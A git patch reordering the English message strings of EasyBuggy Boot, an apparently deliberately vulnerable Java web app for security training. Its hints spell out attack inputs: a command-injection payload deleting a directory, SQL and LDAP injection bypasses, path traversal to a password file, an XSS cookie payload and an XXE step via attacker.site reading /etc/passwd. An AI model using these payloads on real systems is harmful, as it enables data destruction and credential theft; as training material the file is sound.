mail address is an invalid format. +msg.mail.is.empty=Please enter subject and content. +msg.match.regular.expression=The input string matches the regular expression. +msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.not.image.file=The chosen file is not an image file. +msg.not.match.regular.expression=The input string does not match the regular expression. +msg.not.xml.file=The chosen file is not an XML file. +msg.note.brute.force=You can login with admin and password. The number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you sort in the descending order and click the "update" button on the other, then deadlock occurs in database. msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.roundofferror=Round off error occurs if you enter 1. -msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 -msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.ldap.injection=You can login with admin and password. You can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. -msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.netsocketleak=Network socket leak occurs every time you load this page. -msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. +msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. -msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. +msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. -msg.not.image.file=The chosen file is not an image file. -msg.not.match.regular.expression=The input string does not match the regular expression. -msg.not.xml.file=The chosen file is not an XML file. -msg.mail.changed=Your mail address is successfully changed. -msg.mail.change.failed=Mail address change failed. -msg.mail.format.is.invalid=The mail address is an invalid format. -msg.mail.is.empty=Please enter subject and content. -msg.match.regular.expression=The input string matches the regular expression. -msg.max.file.size.exceed=The file size exceeds the allowable limit. -msg.passwd.changed=Your password is successfully changed. msg.passwd.change.failed=Password change failed. +msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. msg.password.not.match=The password does not match. -msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.permgen.space.leak.occur=Memory leak occurs in {0} every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. msg.question.reach.the.moon=How many times would you have to fold a piece of paper (thickness 0.1mm) for it to be thick enough to reach the moon (384,400 km)? msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.smtp.server.not.setup=Mail properties are not correctly set in application.properties. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. -msg.select.upload.file=Select a file to upload. -msg.note.threadleak=Thread leak occurs every time you load this page. -msg.user.not.exist=The user does not exist. +msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. +msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -title.clickjacking.page=Change Your Mail -title.csrf.page=Change Your Password -title.clientinfo.page=Client Information -title.design.test.page=Design Test -title.serverinfo.page=Server Information -style.name.bootstrap=Bootstrap + +section.errors=Errors +section.exceptions=Unchecked Exception +section.performance.issue=Performance Issue +section.troubles=Troubles +section.vulnerabilities=Vulnerabilities + +style.description.basic=Basic header and footer are used. style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ -style.name.google.mdl=Google Material Design Lite style.description.google.mdl=For more detail, please refer to the page\: https\://getmdl.io/ -style.name.materialize=Materialize style.description.materialize=For more detail, please refer to the page\: http\://materializecss.com/ -style.name.nonstyle=Non-Style +style.description.monochro=Monochrome header and footer are used. +style.description.noframe=No header and footer are used. style.description.nonstyle=No stylesheet is specified. style.name.basic=Basic -style.description.basic=Basic header and footer are used. +style.name.bootstrap=Bootstrap +style.name.google.mdl=Google Material Design Lite +style.name.materialize=Materialize style.name.monochro=Monochrome -style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame -style.description.noframe=No header and footer are used. -title.filedescriptorleak.page=Access History +style.name.nonstyle=Non-Style + title.adminmain.page=Main Page for Administrators +title.clickjacking.page=Change Your Mail +title.clientinfo.page=Client Information +title.codeinjection.page=Parse JSON +title.commandinjection.page=Performing Basic Numeric Operations +title.createobjects.page=Sum of natural numbers +title.csrf.page=Change Your Password title.current.date=Display Current Date -title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time +title.dbconnectionleak.page=User List title.deadlock.page=Detect Deadlock +title.design.test.page=Design Test title.endlesswaiting.page=Execute Batch -title.nullbyteinjection.page=Download Guides -title.index.page=EasyBuggy Boot +title.filedescriptorleak.page=Access History +title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator title.memoryleak.page=Heap Memory Usage title.memoryleak2.page=Non-Heap Memory Usage +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones title.mojibake.page=Capitalize String -title.commandinjection.page=Performing Basic Numeric Operations -title.codeinjection.page=Parse JSON title.netsocketleak.page=Measure Response Time -title.strplusopr.page=Random String Generator +title.nullbyteinjection.page=Download Guides title.roundofferror.page=Easy Subtraction +title.serverinfo.page=Server Information title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number -title.createobjects.page=Sum of natural numbers -title.memoryleak3.page=Display Time Zone Information -title.memoryleak3.page.list=Lists of Time Zones +title.strplusopr.page=Random String Generator +title.threadleak.page=Display Current Thread Count title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File -title.dbconnectionleak.page=User List -title.xss.page=Reverse String title.xee.page=Batch Registration of Users +title.xss.page=Reverse String title.xxe.page=Batch Update of Users From c52a53a74e4c78653b8c242d8dcfe4a471d70394 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 24 Oct 2017 21:52:29 +0900 Subject: [PATCH 029/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 355 ++++++++++------------ 1 file changed, 165 insertions(+), 190 deletions(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index d02e954..5b6babb 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -1,148 +1,122 @@ #X-Generator: crowdin.com -description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.\nThe result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. - -section.troubles=Troubles +description.access.history=Access history in this page (The latest 15 records). +description.all=Warning\: Several links cause severe memory leaks or increase a CPU usage rate. They can make your computer unstable.The result may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String +description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. +description.design.test=Please click on one of the links below. +description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. +description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: +description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.performance.issue=Issues for performance +description.random.string.generator=If you enter a character count, then a random characters of the count is created. +description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.reverse.string=If you enter a string, then the reversed string is shown. +description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: +description.send.mail=You can send a mail to the site administrator. +description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. description.troubles=Memory leak, infinite loop, deadlock, and so on\: +description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: -function.name.memory.leak=Memory Leak (Java heap space) -function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. -function.name.memory.leak2=Memory Leak ({0}) -function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. -function.name.memory.leak3=Memory Leak (C heap space) -function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. -function.name.infinite.loop=Infinite Loop -function.description.infinite.loop=Infinite loop occurs if you click this link. -function.name.dead.lock=Deadlock (Java) +function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. +function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.description.code.injection=There is a code injection vulnerability in this page. +function.description.csrf=There is a CSRF vulnerability in the change password page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. -function.name.dead.lock2=Deadlock (SQL) function.description.dead.lock2=Deadlock (SQL) can occur. -function.name.endless.waiting.process=Endless Waiting Process +function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. function.description.endless.waiting.process=Endless waiting process can occur. -function.name.jvm.crash.eav=JVM Crash -function.description.jvm.crash.eav=JVM crashes if you click this link. -function.name.redirect.loop=Redirect Loop -function.description.redirect.loop=Redirect loop occurs if you click this link. -function.name.forward.loop=Forward Loop -function.description.forward.loop=Forward loop occurs if you click this link. -function.name.network.socket.leak=Network Socket Leak -function.description.network.socket.leak=Network socket leak occurs every time you load this page. -function.name.database.connection.leak=Database Connection Leak -function.description.database.connection.leak=Database connection leak occurs every time you load the page. -function.name.file.descriptor.leak=File Descriptor Leak function.description.file.descriptor.leak=File descriptor leak occurs every time you load this page. -function.name.thread.leak=Thread Leak -function.description.thread.leak=Thread leak occurs every time you load this page. -function.name.mojibake=Mojibake -function.description.mojibake=Mojibake can occur. -function.name.int.overflow=Integer Overflow +function.description.forward.loop=Forward loop occurs if you click this link. +function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. -function.name.round.off.error=Round Off Error -function.description.round.off.error=Round off error can occur. -function.name.truncation.error=Truncation Error -function.description.truncation.error=Truncation error can occur. -function.name.cancellation.of.significant.digits=Cancellation of Significant Digits -function.description.cancellation.of.significant.digits=Cancellation of significant digits can occur. -function.name.loss.of.trailing.digits=Loss of Trailing Digits +function.description.jvm.crash.eav=JVM crashes if you click this link. +function.description.ldap.injection=There is an LDAP injection vulnerability in this page. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. - - -section.performance.issue=Performance Issue -description.performance.issue=Issues for performance - -function.name.slow.regular.expression=Delay due to regular expression parse +function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. +function.description.memory.leak2=Memory leak occurs in {0} every time you load this page. +function.description.memory.leak3=Memory leak occurs in C heap space every time you load this page. +function.description.mojibake=Mojibake can occur. +function.description.network.socket.leak=Network socket leak occurs every time you load this page. +function.description.null.byte.injection=There is a null byte injection vulnerability in this page. +function.description.open.redirect=There is an open redirect vulnerability in this login page. +function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.description.path.traversal=There is a path traversal vulnerability in this page. +function.description.redirect.loop=Redirect loop occurs if you click this link. +function.description.round.off.error=Round off error can occur. +function.description.session.fixation=This login page is vulnerable for session fixation attack. function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. -function.name.stop.the.world=Stop the World -function.description.stop.the.world=Stop the World occurs if you click this link. - - -section.vulnerabilities=Vulnerabilities -description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: - -function.name.xss=XSS (Cross Site Scripting) -function.description.xss=There is a cross site scripting vulnerability in this page. -function.name.sql.injection=SQL Injection function.description.sql.injection=There is an SQL injection vulnerability in this page. -function.name.ldap.injection=LDAP Injection -function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.throwable={0} is thrown if you click this link. +function.description.truncation.error=Truncation error can occur. +function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. +function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. +function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. +function.description.xee=There is an XEE vulnerability in this page. +function.description.xss=There is a cross site scripting vulnerability in this page. +function.description.xxe=There is an XXE vulnerability in this page. +function.name.brute.force=Login page that allows brute-force attacks +function.name.clickjacking=Clickjacking function.name.code.injection=Code Injection -function.description.code.injection=There is a code injection vulnerability in this page. -function.name.os.command.injection=OS Command Injection -function.description.os.command.injection=There is an OS command injection vulnerability in this page. +function.name.csrf=CSRF (Cross-site Request Forgery) +function.name.dangerous.file.inclusion=Dangerous File Inclusion +function.name.database.connection.leak=Database Connection Leak +function.name.dead.lock=Deadlock (Java) +function.name.dead.lock2=Deadlock (SQL) +function.name.endless.waiting.process=Endless Waiting Process +function.name.file.descriptor.leak=File Descriptor Leak +function.name.forward.loop=Forward Loop +function.name.infinite.loop=Infinite Loop +function.name.int.overflow=Integer Overflow +function.name.jvm.crash.eav=JVM Crash +function.name.ldap.injection=LDAP Injection +function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection -function.description.mail.header.injection=There is a mail header injection vulnerability in this page. +function.name.memory.leak=Memory Leak (Java heap space) +function.name.memory.leak2=Memory Leak ({0}) +function.name.memory.leak3=Memory Leak (C heap space) +function.name.mojibake=Mojibake +function.name.network.socket.leak=Network Socket Leak function.name.null.byte.injection=Null Byte Injection -function.description.null.byte.injection=There is a null byte injection vulnerability in this page. -function.name.unrestricted.size.upload=Size Unrestricted File Upload -function.description.unrestricted.size.upload=This page is vulnerable for attacks such as code injection because there are no limitation for uploading file extension. -function.name.unrestricted.ext.upload=Extension Unrestricted File Upload -function.description.unrestricted.ext.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.name.open.redirect=Login page that allows Open Redirect -function.description.open.redirect=There is an open redirect vulnerability in this login page. -function.name.brute.force=Login page that allows brute-force attacks -function.description.brute.force=This login page is vulnerable for brute-force attack because it does not have an account lock mechanism. -function.name.session.fixation=Login page that allows session fixation attacks -function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.name.verbose.error.message=Verbose Authentication Error Messages -function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. -function.name.dangerous.file.inclusion=Dangerous File Inclusion -function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. +function.name.os.command.injection=OS Command Injection function.name.path.traversal=Path Traversal -function.description.path.traversal=There is a path traversal vulnerability in this page. +function.name.redirect.loop=Redirect Loop +function.name.round.off.error=Round Off Error +function.name.session.fixation=Login page that allows session fixation attacks +function.name.slow.regular.expression=Delay due to regular expression parse +function.name.slow.string.plus.operation=Delay of creating string due to +(plus) operator +function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation +function.name.sql.injection=SQL Injection +function.name.thread.leak=Thread Leak +function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure -function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. -function.name.csrf=CSRF (Cross-site Request Forgery) -function.description.csrf=There is a CSRF vulnerability in the change password page. -function.name.clickjacking=Clickjacking -function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. +function.name.unrestricted.ext.upload=Extension Unrestricted File Upload +function.name.unrestricted.size.upload=Size Unrestricted File Upload +function.name.verbose.error.message=Verbose Authentication Error Messages function.name.xee=XEE (XML Entity Expansion) -function.description.xee=There is an XEE vulnerability in this page. +function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) -function.description.xxe=There is an XXE vulnerability in this page. - - -section.errors=Errors -description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: - -function.description.ei.error=ExceptionInInitializerError is thrown at first, and NoClassDefFoundError is thrown from the second if you click this link. - - -section.exceptions=Unchecked Exception -description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: -function.description.throwable={0} is thrown if you click this link. - - - -description.access.history=Access history in this page (The latest 15 records). -description.capitalize.string=If you enter a string, then the capitalized string is shown. For example\: capitalize string -> Capitalize String -description.design.page=You can change design of this page. Please click one of the links below and change \nthis page to your style. -description.design.test=Please click on one of the links below. -description.endless.waiting=If you enter a character count, then a batch (including echo characters of the count) is created and executed. -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. -description.random.string.generator=If you enter a character count, then a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. -description.reverse.string=If you enter a string, then the reversed string is shown. -description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. -description.send.mail=You can send a mail to the site administrator. label.access.time=Access Time -label.available.characters=Available Characters label.attach.file=Attach File +label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String label.character.count=Character Count label.code=Code label.content=Content -label.current.date=Current Date label.current.thread.count=Current Thread Count -label.current.time=Current Time label.execution.result=Execution Result\: -label.goto.admin.page=Go to admin main page label.go.to.main=Go to main page +label.goto.admin.page=Go to admin main page label.history.back=Back label.ip.address=IP Address label.json.string=JSON String @@ -153,22 +127,22 @@ label.login.user.id=Login User ID label.logout=Log out label.lowercase.characters=Lowercase Characters label.mail=Mail Address -label.memory.init=Init Value -label.memory.used=Used Init Value +label.memory.collection.usage=Collection Usage label.memory.committed=Committed Init Value +label.memory.init=Init Value label.memory.max=Max Init Value -label.memory.usage=Memory Usage label.memory.peak.usage=Peak Memory Usage -label.memory.collection.usage=Collection Usage +label.memory.usage=Memory Usage +label.memory.used=Used Init Value label.metaspace=Metaspace -label.permgen.space=PermGen space -label.platform=Platform label.name=Name label.numbers=Numbers label.obelus=/ label.password=Password +label.permgen.space=PermGen space label.phone=Phone label.ping.url=Ping URL +label.platform=Platform label.response.code=Response Code label.response.time=Response Time label.reversed.string=Reversed String @@ -179,14 +153,9 @@ label.string=String label.subject=Subject label.submit=Submit label.times=times -label.timezone.dst.savings=Amount of DST -label.timezone.has.same.rules=Same Rule as Default label.timezone.id=Time Zome ID -label.timezone.in.daylight.time=Being in DST label.timezone.name=Time Zome Name label.timezone.offset=Time Zome Offset -label.timezone.raw.offset=Amount of Raw Offset Time -label.timezone.use.daylight.time=Useing DST label.update=Update label.upload=Upload label.uppercase.characters=Uppercase Characters @@ -194,8 +163,9 @@ label.user.agent=User Agent label.user.id=User ID label.value=Value label.version=Version -label.your.name=Your Name label.your.mail=Your Mail Address +label.your.name=Your Name + msg.account.locked=Your account is locked out because the number of login failures exceeds 10 times. msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! @@ -205,7 +175,6 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -216,140 +185,146 @@ msg.dead.lock.detected=Deadlock is detected. msg.dead.lock.not.occur=Deadlock has not occurred yet. msg.deadlock.occurs=A lock could not be obtained due to a deadlock. msg.download.file=You can download the following PDF files. +msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.name=Please enter your name. +msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. msg.enter.positive.number=Please enter a positive number. -msg.enter.decimal.value=Please enter the absolute value of a decimal number less than 1. -msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. -msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. -msg.need.admin.privilege=You need admin privileges to go ahead from here. -msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. +msg.mail.change.failed=Mail address change failed. +msg.mail.changed=Your mail address is successfully changed. +msg.mail.format.is.invalid=The mail address is an invalid format. +msg.mail.is.empty=Please enter subject and content. +msg.match.regular.expression=The input string matches the regular expression. +msg.max.file.size.exceed=The file size exceeds the allowable limit. +msg.not.image.file=The chosen file is not an image file. +msg.not.match.regular.expression=The input string does not match the regular expression. +msg.not.xml.file=The chosen file is not an XML file. +msg.note.brute.force=You can login with admin and password. The number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you sort in the descending order and click the "update" button on the other, then deadlock occurs in database. msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.roundofferror=Round off error occurs if you enter 1. -msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. -msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
